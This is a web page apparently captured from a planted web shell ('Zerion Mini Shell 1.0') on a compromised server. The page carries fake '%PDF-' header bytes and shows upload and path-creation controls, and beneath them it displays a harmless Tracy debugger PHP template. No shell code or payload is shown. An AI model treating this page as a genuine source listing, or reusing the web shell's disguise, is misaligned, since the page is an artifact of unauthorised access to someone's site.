%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /www/varak.net/losik.varak.net/vendor/tracy/tracy/src/Tracy/Bar/panels/
Upload File :
Create Path :
Current File : /www/varak.net/losik.varak.net/vendor/tracy/tracy/src/Tracy/Bar/panels/dumps.panel.phtml

<?php

declare(strict_types=1);

namespace Tracy;

/** @var array[] $data */
?>
<style class="tracy-debug">
	#tracy-debug .tracy-DumpPanel h2 {
		font: 11pt/1.5 sans-serif;
		margin: 0;
		padding: 2px 8px;
		background: #3484d2;
		color: white;
	}
</style>

<h1>Dumps</h1>

<div class="tracy-inner tracy-DumpPanel">
<?php foreach ($data as $item): ?>
	<?php if ($item['title']):?>
	<h2><?= Helpers::escapeHtml($item['title']) ?></h2>
	<?php endif ?>

	<?= $item['dump'] ?>
<?php endforeach ?>
</div>

Zerion Mini Shell 1.0